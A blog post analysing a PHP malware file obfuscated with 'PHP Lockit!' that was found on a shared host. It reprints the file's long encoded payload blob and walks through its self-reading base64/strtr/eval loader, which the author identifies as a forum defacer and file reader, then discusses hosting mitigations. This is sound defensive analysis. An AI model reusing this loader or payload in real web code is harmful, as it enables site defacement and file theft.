BCIa29ZcynZcbYzwyYpfoAIWMyzCbkpdoLIWMlZwyYlD2lScoAIWM9sCMySCB5LDUEikZL7Nt9zC3kpFuW+wjSYtm0Ytm0YtMlMhtOMCbOide09wmnPFokJwJl7eWplC2ivwtw8fol0doA+BZOzDbOlbUn+wtYZd290WoI0C2slFJ50FJn8wyniFBAIKJnWUynJCJnwCBYqNt90DbOScT4JKX0hcBYPdZEJeWPIwtEINoIZNlnwAokJwrsifoamd3kpwrI0C2SINt9PHj48Cmw+NokZNjxLDbCIDBW9DoyJcbkScbwICBxpc249doaMfe48cM9ZdUnscbOPd2W9Ar9TatniC3Opd249kZF+eWP8Ftnidolmdj1jcB50cbw+kM5JF3E7Nt9XNILYtIL8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNL15F3ySwrivF3WMdMkzFeS6Nt9Md250NJcVCmYXKZcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1XDunJCMOJDtn2CBx1cT1Sd2YidoivF3WIF2l6cT0mHTAmwe4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNJcVCmYXK1clFMlACBkidv0IKJE8R2cvdmW+kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNbnPFokJcokVwuYpGMA9kzr1kZE+NokZNI0hwtEIwtEIwtEIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+U3aSdoyV/BN9kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7KjXvcM9Vfe4MdMkzFeSMdMkzFeS8DB5XfbWIfulXcT10cbi0wo5idBA9FoiXCMkLCmAIF2l6cT0mHTAmwe4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNJcVCmYXKZcVCmYXK95pcmklkM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7KJcVCmYXKZcVCmYXKzXvcM9Vfe48DB5XfbWIfulXcT1XCbYzf29ZctnVCB1lNbnPFokJcokXwuYpGMA9kzr2kZE+NokZNI0htWLIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+U2y0cUnkOtcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKzPMdMkzFeS8R2cvdmW+kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNBsifolLwuYpGMA9kzAxkZn2CBx1cT0mHUFINjxJFj4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNLlVcoa4wrsvctcVCmYXKZcVCmYXKZcVCmYXKzPMdMkzFeSMdMkzFeSMdMkzFeS8R2cvdmW+NolVFua0wuO5FoA9foa4ftnVCB1lNbnPFokJD2y0wuYpGMA9kzAxkZE+NokZNjxJFj4YtJEIwtEIwtEIwtE8col2woySDBfVNBYldmOlFj48DB5XfbWIfulXcT1zfBksDbWIfMySfBA9k1lvdoxiwrfpfuYpdJrmwe48R2Opfj48R2cvFM0+Nt9LDbC+eWPkNuEICBxpc249C2aVfoaZNJcVCmYXKzXvFe48Ftnidolmdj1jcB50cbw+kM5JF3E7Nt9XNILIwE0htWLIwE0htWLIwtw7eWPLFoiXCMkgcokPwe0Iky9WT1YABZfXDunJCMOJDtffKX0hkunPFokJb2OJfUE9wtOgAr9TaySmFoiXCMkLCmAmbTSYtJOXDunJCl9LCM4INUELb1nNA1Odk3nPFokJcokVk107eWPLFoiXCMkgcokXwe0Iky9WT1YABZfXDunJCMOJFtffKX0hkunPFokJb2siftE9wtOgAr9TaySmFoiXCMkqCbWmbTSYtJOqCbOlc29ZDBlLNUOgAr9TaySmD2y0DBWmbTSYtMlMwtIicB1XfuLPkunPFokJb2OJDtLIkJCicB1XfuLPkunPFokJb2OJfULIkJCicB1XfuLPkunPFokJb2OJdJLIkJCicB1XfuLPkunPFokJb2siftLpeWp7eWpsGbYxdy9jd25VcBY0htOXDunJCl9LCMISkunPFokJb2OJfUXLFoiXCMkgcokXhUnvFJnLDBAPdblzFBxgcbkZd3wPhUL7eWpsGbYxdy9zcBxlC3OgcowPkunPFokJb2OJdJLId3wIcollho15F3ySb2aZFM9ZhtLpKX0hkoyxHTEINUEJaanrWaOywunPFokJb2Yifoamd3kpcbHIwyYyatnjCbOgfol0doA9kZwVkunPFokJb2sift4JkZnbUraUOUnjCbOgDBW9kZwVkosifoamd3kpDBWVwJFJKX0hkuklF3aSftE9wo15F3ySb3y1cbk5htOiFTrXhUnvFJnLDBAIho15F3ySb2aZFM9ZhtLpKX0hcBYPdZEJNuYjFMlXfe5idoaZftImUoaLcBCIAriWCMwIA2l0cUntCbYiFMlSDUntDbwIA2aqDBxLcUntd21JCBxidMOpwtrmhTS8R3YjFMlXfe4JKX0hgW0hgW0hDBCPkocifoySNT0JdblJCJwpGX0hcBYPdZEJNuOpfoxlNlSLF2l0ca0IgJEjFM9vfrnPYoYqcbwVfuwIgtnWCbylwePITbltWJnwCBYqNt90DbOScT4JKX0hcBYPdZEJeWPIwtEINoIZNL15WLwIUo9scanic2AIUeOjDZE8R2IZNjxJFj48Cmw+NoOpfJnpce1PCBklFMxlFJnidolmdj1ScBc0NjxMd3kswo1lfoivce1WT1YAwoyjfolvdj0mkz4YtjxXwoySDBfVNBYldmOlFj4MdMkzFeS8R3E+tW0htTxMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+TblzFBXIUo9zftcVCmYXKzP8R2cvdmW+kM5JF3E7kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNB15CMkLCMIIfMySfBA9do9jCBxPd3Y0wuYpGMA9kzr1kZE+eWPktUEINocvdmWIcMyjcT0mWbkpCBXmwoYvdo9ZNUFjcMcMcMcMkz4MdMkzFesBcbkpaoyJCB79wePINt9Md250NJcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1sGBkJcokVwuYpGMA9kzr1kZE+NokZNI0hwtEIwtEIwtEIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+U3aSdoyV/BN9kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7KjXvcM9Vfe4MdMkzFeSMdMkzFeS8DB5XfbWIfulXcT10cbi0wo5idBA9dblJCMOJfUnzDbplNUFxYUFINI0htWLIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+kM5JF3E7kM5JF3E73MlMFMAMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeS6kM5JF3E7kM5JF3E7Nt9Md250Njxpdmn1ftn0GbnlNbniF3Y3d3kLwo5idBA9dblJCMOJFtnzDbplNUFxYJFINjxJFj4YtJEIwtEIwtEIwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNjxjcB50cbw+UB5LcbIIU29LNt9Md250NjxJFj4MdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSYtILkwtE8foa4foyZcBrIdMyscT1sGBkJDB5LcbIIFM93Fz0mYUFIC29SFz0mHzHmwe5PYoYqcBWICmLIDeOjD2aZRmOZNt90cbi0CbklCT48R2YldmOlFj48Cmw+eWPIwtEIwtEIwtEINokZNjxjcB50cbw+NolVFua0wuO5FoA9F3aJdBl0wucidualNUfcd2xSCUnuDbOzDB4ikZE+Nt9Md3ksNjXvC2aVfoaZNjXvC2aVfoaZNJw7eWPLdblJCl9LCMIINUELb1nNA1Odk215CMkLCMImbTSYtJOsGBkJb2OJfUE9wtOgAr9TaySmdblJCMOJfUffKX0hko15CMkgcokVwe0Iky9WT1YABZfsGBkJcokVk107eWPLdblJCl9LCmEINUELb1nNA1Odk215CMkLCmEmbTSYtJOsGBkJb2lVcoa4we0Iky9WT1YABZfsGBkJDB5LcbImbTSYtMlMwtIicB1XfuLPko15CMkgcokPhUEMkJyldbn0GUILdblJCl9LCmApwtCMwBasFuO5htOsGBkJb2OJdJLIkJCicB1XfuLPko15CMkgDB5LcbIphW0hGX0hdblzFBxgC29VdMajftILdblJCl9LCMISko15CMkgcok1RtOsGBkJb2OJFtLId3wIcollho15F3ySb2aZFM9ZhtLpKX0hdblzFBxgF2aScBY0b2OJhtOsGBkJb2OJdJLId3wIcollho15F3ySb2aZFM9ZhtLpKX0hkunZcBcpGe0JdblJCl8JKX0hkoyxYZE9wtkaArOnarAIwJ4LFuklcMl4RJk0cB1Xdoy0cbHIA0aAwuOldbnSCbOlNUFJRJOsGBkJb2lVcoa4RJwmwyfwOakywuOpfoxlNUfpdMOlGtFJKX0hkuklF3aSftE9wo15F3ySb3y1cbk5htOiFTFpwo9ZwoOpcUEPdblzFBxgcbkZd3wPhUL7eWplC2ivwtw8F2YZDbn0NMyScbk0htfwcBOlcJnYBBkJwyYpfoAIWMyzCbkpdoLIWMlZwyYlD2lScoAIWM9sCMySCB5LDUEikZL7Nt9zC3kpFuW+wjSYtm0Ytm0YtMlMhtOMCbOide09wmYscJwpGX0hcBYPdZEJNuOpfoxlNlSLF2l0ca0IgJEjFM9vfrnPYoYqcbwVfuwIgtnWCbylwePIA01owriiC2S8R3OpfoxlNJw7eWplC2ivwtwYtJEIwtE8Dew+A01owrsifoamd3kpwrI0C2SINt9PHj48Cmw+NokZNjxLDbCIDBW9DoyJcbkScbwICBxpc249doaMfe48cM9ZdUnscbOPd2W9Ar9TatniC3Opd249kZF+eWP8Ftnidolmdj1jcB50cbw+kM5JF3E7Nt9XNILYtIL8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNL15F3ySwrivF3WMdMkzFeS6Nt9Md250NJcVCmYXKZcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1zdBcLCMIIfMySfBA9do9jCBxPd3Y0wuYpGMA9kzr1kZE+eWPktUEINocvdmWIcMyjcT0mWbkpCBXmwoYvdo9ZNUFjcMcMcMcMkz4MdMkzFesBcbkpaoyJCB79wePINt9Md250NJcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1zdBcLCM4IF2l6cT0mHTAmwe48Cmw+eWPIwtEIwtEIwtEINocvdmWIcMyjcT0mWbkpCBXmwoYvdo9ZNUFjcMcMcMcMkz5RfBxSCB79C/0MdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeS6Nt9Md250NJcVCmYXKZcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1zdBcLCmAIF2l6cT0mHTAmwe4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNJcVCmYXKZcVCmYXK95pcmklkM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7kM5JF3E7KJcVCmYXKZcVCmYXKzXvcM9Vfe48DB5XfbWIfulXcT1XCbYzf29ZctnVCB1lNbYscMOJFtnzDbplNUFxYJFINjxJFj4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNLsifoAIUAWMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeS6kM5JF3E7Nt9Md250NJcVCmYXKzxpdmn1ftn0GbnlNbOlGuWIdMyscT1qCbOpctnzDbplNUF1HUFIfMySfBA9kzrmwe48Cmw+eWPktUEINocvdmWIcMyjcT0mWbkpCBXmwoYvdo9ZNUFjcMcMcMcMkz5kdMOlGtnRd2WMdMkzFeSMdMkzFeSMdMkzFeS6kM5JF3E7kM5JF3E7kM5JF3E7Nt9Md250Njxpdmn1ftn0GbnlNbOlGuWIdMyscT1zdBcgDB5LcbIIF2l6cT0mYTrmwe48Cmw+NokZNI0hwtEIwtEIwtEIwexLDbCICBxpc249C2aVfoaZNjxpdmn1ftn0GbnlNbY1CM1pftn2CBx1cT0mBB9SdorIO2l0F2lVwUFINjXvcol2NjXvcM9ZdT48R2Opfj4YtIL8Ftnidolmdj1jcB50cbw+kM5JF3E7Nt9XNjxXwoySDBfVNBYldmOlFj4MdMkzFeS8R3E+tUEIeWPktUEIeWPktUEIwjSYtJOzdBcgcokPwe0Iky9WT1YABZfzdBcLCMImbTSYtJOzdBcgcok1we0Iky9WT1YABZfzdBcLCmAmbTSYtJOzdBcgcokVwe0Iky9WT1YABZfzdBcLCM4mbTSYtJOzdBcgcokXwe0Iky9WT1YABZfzdBcLCmEmbTSYtJOzdBcgDB5LcbIINUELb1nNA1Odk3Yscl9pdMOlGtffKX0hkuYscl9qCbOpce0Lb1nNA1Odk2sifolLk107eWppcJEPwBasFuO5htOzdBcgcokPhUEMkJyldbn0GUILF21Mb2OJfULIkJCicB1XfuLPkuYscl9LCM4pwtCMwBasFuO5htOzdBcgDB5LcbIphW0hGX0hdblzFBxgC29VdMajftILF21Mb2OJDtXLF21Mb2OJfUXLF21Mb2OJFtLId3wIcollho15F3ySb2aZFM9ZhtLpKX0hdblzFBxgF2aScBY0b2OJhtOzdBcgcokVhUnvFJnLDBAPdblzFBxgcbkZd3wPhUL7eWPLFuklcMl4NUkzdBcgwjSYtJOiFTrZwe0IwlaWOryAOUEJRJOXFMaMDbIVwMYifoamd3kpcbHIA0aAwo5idBA9kZwVkuYscl9pdMOlGt4JkZnbUraUOUnkOy9eWaW9kZwVkuYscl9qCbOpct4JkZw7eWPLFMazfBx0we0IdblzFBxgFbalFmLPkoyxHTwpwo9ZwoOpcUEPdblzFBxgcbkZd3wPhUL7eWplC2ivwtw8F2YZDbn0NMyScbk0htfwcBOlcJnTTACIA2l0cUntCbYiFMlSDUntDbwIA2aqDBxLcUntd21JCBxidMOpwtrmhTS8R3YjFMlXfe4JKX0hgW0hgW0hDBCPkocifoySNT0JfMk1doxlfolVwJl7eWplC2ivwtw8fol0doA+BZOzDbOlbUn+wtYZd290WoI0C2slFJ50FJn8wyniFBAIKJnBCmaSdoa0DB4IUoyjDzXvfol0doA+wjSYtMajDo8IwI0hwtEIwexPHj5BCmaSdoa0DB4IUo9scanic2AIUeOjDZE8R2IZNjxJFj48Cmw+NoOpfJnpce1PCBklFMxlFJnidolmdj1ScBc0NjxMd3kswo1lfoivce1WT1YAwoyjfolvdj0mkz4YtjxXwoySDBfVNBYldmOlFj4MdMkzFeS8R3E+tW0htTxMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+TblzFBXIUo9zftcVCmYXKzP8R2cvdmW+kM5JF3E7kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNBOJDtn2CBx1cT1Sd2YidoivF3WIF2l6cT0mHTAmwe4YtILkwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNJcVCmYXK1clFMlACBkidv0IKJE8R2cvdmW+kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNBOJdJnzDbplNUFxYUFINjxJFj4YtJEIwtEIwtEIwtE8cM9VftnMCBYlNUfnFMlidtFIC29Sd3w9kZYMcMcMcMCmNLs1doxidv1j/UcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKzP8R2cvdmW+kM5JF3E7kM5JF3E7NolVFua0wuO5FoA9foa4ftnVCB1lNBOJfUnzDbplNUFxYUFINI0htWLIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+kM5JF3E7kM5JF3E73MlMFMAMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeS6kM5JF3E7kM5JF3E7Nt9Md250Njxpdmn1ftn0GbnlNbniF3Y3d3kLwo5idBA9cokXwuYpGMA9kzr2kZE+NokZNI0hwtEIwtEIwtEIwexMd250wociC2A9k0yZDBySkZnjd2xvFj0mw2cMcMcMcJF+NoYldmOlFj4MdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSMdMkzFeSYtILkwtEMdMkzFeSMdMkzFeSMdMkzFeskdMOlGtnRd2W8R2cvdmW+NokZNJcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKZcVCmYXKX0htWLIwex0cbi0CbklCUnVCB1lNBlVcoa4wukvf3H9kzAmwoYvduH9kzHzkZE+DeOjD2aLwok5woI0C2slFJ50FjXvfoa4foyZcBr+Nt9jcB50cbw+NokZNI0hwtEIwtEIwtEIwexJFj48C2aVfoaZNjxpdmn1ftn0GbnlNbY1CM1pftn2CBx1cT0mBB9SdorIO2l0F2lVwUFINjXvcM9ZdT48R2YldmOlFj48R2YldmOlFj4JKX0hkoI0C2slFj0JFo93cbklctntGUnPYoYqcbwVfuwIKJLpwjSYtJOLCMIINUELb1nNA1Odk2OJDtffKX0hkoOJdJE9wtOgAr9TaySmcokVk107eWPLcok1we0Iky9WT1YABZfLCmAmbTSYtJOLCmEINUELb1nNA1Odk2OJFtffKX0hkolVcoa4we0Iky9WT1YABZfpdMOlGtffKX0hkolVcoa4NbY0Fl9ZcbnSCBYlhtkFkZwSwJFJRtOpdMOlGtL7eWPLF2a0b2lVcoa4wtE9wtk7btO7cbcidtiJCbYlYjOgcoajd2OlhyXmwjSYtJOzcbOgDB5LcbIIRj0ICMyzcTC0b2aVC29LcUIJcBYPdZnFwJOpdMOlGyXJKZwpKX0hkuYlfy9pdMOlGtEVNUEJbtFphb19G1XLG2a4DbWPhb19Nt90cbi0CbklCT4JKX0hDBCIhtyldbn0GUILcokPhUEMkJyldbn0GUILcokVhUEMkJyldbn0GUILcok1hUEMkJyldbn0GUILDB5LcbIphW0hGX0hdblzFBxgC29VdMajftILcokPRtOLCmASkoOJFtLId3wIcollho15F3ySb2aZFM9ZhtLpKX0hdblzFBxgF2aScBY0b2OJhtOLCM4pwo9ZwoOpcUisGbYxdy9lFmkvFJIphTSYtJOMCbOiderINUEJaanrWaOywuOldbnSCbOlwyYyatn0cB1Xdoy0cT0mwJ4LF2a0b2lVcoa4RJwJRJOPYoYqcbwVwJFIa0iyALAIfol0doA9k3YXCBYlFl9vFoaVkZw7eWPLcMy0CBXZwe0IwlaWOryAOUn0cB1Xdoy0cUnTOaWIfoasFoxifoA9kZwVkuYlfy9pdMOlGt4JwJ4LDeOjD2aZRJwmwyfwOakywuOpfoxlNUfoT1kaTAiNTAAmwjSYtJOMCbOideHINUEJaanrWaOywuY0GBxlwyYyatnjF3H9kZwVkuYlfy9pdMOlGt4JwJ4LDeOjD2aZRJwmRtnzfulScbciFmH9kZFSwoYzF2Yvdo9ZFz0mkZXIcBOpfo9ZF3O5doazNUFmwjSYtJOZcbY1duWINUnsGbYxdy9xfBaZGUILcMy0CBXxhUnvFJnLDBAIho15F3ySb2aZFM9ZhtLpKX0hkuklF3aSftE9wo15F3ySb3y1cbk5htOMCbOidewpwo9ZwoOpcUEPdblzFBxgcbkZd3wPhUL7eWPLFMazfBx0we0IdblzFBxgFbalFmLPkocifoySHZLId3wIcollwtisGbYxdy9lFmkvFJIphTSYtMajDo8IwjxzC3kpFuW+CBxlFmWPk0ilcoaMwycJfBxScbOpdJnTDbOlwrkiF2yZDBxpwrkpFJnTcBspdoOlwrkvdBkidoyVcoLIwUFpKzXvF2YZDbn0NJw7eWp9eWp9eWP7cBYPdZEmNyYeALlWatn0GbnlNUk0cbi0R2pifMyzC3kpFuWJwoxidMf1CBflNUkQCbciF2YZDbn0wJnzFMH9wMi0fuE6RZ93f3FVGM9VcU1PRmazR3YVDBCvC29vD2llRMpzwj48R1YeALlWae4YtjXvfoyJdoA+NokZNjxLDbCIC2xiF3H9CMyZDoaicoaZHJnjd2xzFoyVNTw+NocvdmWIC29Sd3w9FMaLNMYvcoaLwok5wexiwoiZcBC9DuO0FePvR3pvdMAsDt51FZn0CbkmcbW9DBcZCB1lNjxMd250woYvdo9ZNbklce5PYoYqcbwVfuwINt9Md250NjXvCT48Cmw+NorIDuklcj1PfuOXKJ8vDoYqFJ10FJ51FZn0CbkmcbW9DBcZCB1lNjxMd250woYvdo9ZNbklce5PC2sZRbOZRmazR29ZcZE8R2cvdmW+Nt9iNJn8wexiwoiZcBC9DuO0FePvR2y0foyjD2aZGJ5jd20IfoyZc2a0NBlMFMyscT48cM9Vftnjd2xvFj1ZcBW+CbO0CBYqcbk6RMYvdUE8R2cvdmW+Nt9iNJn8wexiwoiZcBC9DuO0FePvR3pvdMAsDt51FZn0CbkmcbW9DBcZCB1lNjxMd250woYvdo9ZNbklce56d25lRBIVfbHINt9Md250NjXvCT48Cmw+NocvdmWIC29Sd3w9f2ipfoA+A2y5cMrIBgxqdoaVdBAIA/xZcbYpweP8R2cvdmW+wtF7cBYPdZnZd3aVctimcbOsDBYZd3OpdBAPhU1zfoyZfuOpdBASYtL7K2ajDo8IkzXvcM9Vfe48R2Opfj4YtJF7

It has been obfuscated using a rather lame commercial product called PHP Lockit!. They claim it's encrypting the PHP, but that's a lie, it's half-assed obfuscation and easily reversed.

The first part is to urldecode a string and then build a bunch of strings out of it. Here it is with better variable names:

$chars=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); // $chars = "fg6sbehpra4co_tnd";
$base64_decode=$chars{4}.$chars{9}.$chars{3}.$chars{5};
$base64_decode.=$chars{2}.$chars{10}.$chars{13}.$chars{16};
$base64_decode.=$base64_decode{3}.$chars{11}.$chars{12}.$base64_decode{7}.$chars{5};
$fopen=$chars{0}.$chars{12}.$chars{7}.$chars{5}.$chars{15};
$fgets=$chars{0}.$chars{1}.$chars{5}.$chars{14}.$chars{3};
$fread=$chars{0}.$chars{8}.$chars{5}.$chars{9}.$chars{16};
$strtr=$chars{3}.$chars{14}.$chars{8}.$chars{14}.$chars{8};
$filename=__FILE__;
$count=26100;

Then it uses one of them to base64_decode() and then eval() a string:

eval(
  $base64_decode(
    'aWYoITApJE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwME8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMzgwKSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'
  )
);
return;

This decodes to another obfuscated bit of code, which I've cleaned up to this:

if(!0) $thisfile = $fopen($filename,'rb');
$fgets($thisfile,1024); // skip first 1K
$fgets($thisfile,4096); // skip rest of first line
$part2 = $base64_decode(
  $strtr(
    $fread($thisfile,380), // first part of magic string after "?>"
    'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=',
    'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
  )
);
eval($part2);

This is reading the first 380 chars of the big block of text after the end of the PHP code, doing some character swapping, and then eval()ing the result. So what is that?

$part3 = ereg_replace(
  '__FILE__',
  "'".$filename."'",
  $base64_decode(
    $strtr(
      $fread($thisfile, $count), // second part of magic string
      'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=',
      'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    )
  )
);
fclose($thisfile);
eval($part3);

This is looking familiar. Our protagonist is reading in the rest of that line, performing the exact same substitution (is it that hard to make a new mapping?) and then performing a useless substitution (there is no "__FILE__" in the text; plus, it'd get filled in anyway). Then he's eval()ing again, finally closing the file, which is kind (except he's has forgotten to use $fclose).

This time the eval()d code is >25KB. At this point he is done; he has a nice malicious PHP page for abusing people's forums, reading arbitrary files... and that's it. This is just a script kiddie forum defacer.

What do we do about this kind of idiot? Well, we don't let people upload PHP scripts, for a start. The only way this can get in there is from someone else on the shared server putting files in a world-writeable directory. (That person could well be the Apache/PHP user, via a malicious script executed via a flaw in someone else's website on the same server.) And to allow PHP uploads, we can't really avoid that being possible. The options are:

  • A private server (dedicated box), where there is nobody else around. Could be expensive, and you really need a sysadmin to keep on top of it.
  • A virtualised server, where our stuff is sandboxed away from everyone else. Looks like the former one but should be cheaper.
  • A system set up to run Apache and/or PHP as a specific user who is in the same group as the "account user". Easier said than done, apparently.

We'll probably get to one of these eventually. Until then... well, let's be careful out there.